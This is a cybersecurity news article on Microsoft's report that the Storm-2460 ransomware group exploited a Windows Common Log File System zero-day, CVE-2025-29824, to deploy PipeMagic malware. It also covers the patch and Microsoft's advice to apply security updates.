Fraud Management & Cybercrime
                                                    ,
                                                            Governance & Risk Management
                                                    ,
                                                            Patch Management
                                                                                                
                    Tech Giant Says Threat Actors Are Exploiting a Flaw in Widely-Targeted Windows Tool
                

Ransomware threat actors exploited a zero-day vulnerability in a widely targeted Windows logging system known for managing transactional records, using it to launch attacks against organizations in the U.S. real estate sector, Microsoft said Tuesday.
See Also: Top 10 Technical Predictions for 2025
The tech giant said in a blog post the hackers used the previously unknown flaw discovered in Windows’ Common Log File System – a frequent target for attackers seeking privilege escalation – to strike “a small number of targets,” including American real estate firms, a Spanish software firm, the financial sector in Venezuela and the retail sector in Saudi Arabia. The Cybersecurity and Infrastructure Security Agency added the vulnerability – tracked as CVE-2025-29824 – to its “Known Exploited Vulnerabilities Catalog” with a CVSS score of 7.8.
Microsoft said the flaw had been used by a ransomware threat actor known as Storm-2460, which exploited it to deploy PipeMagic malware. In March, the company patched a separate vulnerability in the Windows Win32 Kernel Subsystem that allowed attackers to escalate privileges to system level – an exploit researchers later linked to targeted attacks involving a PipeMagic backdoor against organizations in Asia and Saudi Arabia.
Microsoft said it “highly recommends” organizations apply all available security updates for elevation of privilege flaws “to add a layer of defense against ransomware attacks if threat actors are able to gain an initial foothold.”
Microsoft said it has not yet identified how Storm-2460 initially gained access to compromised devices, but added the group used the Windows certutil utility to download malware from a legitimate third-party site it had previously compromised. After deploying PipeMagic, the attackers launched the log system exploit directly in memory using a process that allowed them to avoid writing files to disk and evade detection.
The company released security updates Tuesday and said that customers running Windows 11, version 24H2 “are not affected by the observed exploitation, even if the vulnerability was present.”
Microsoft did not immediately respond to a request for comment.
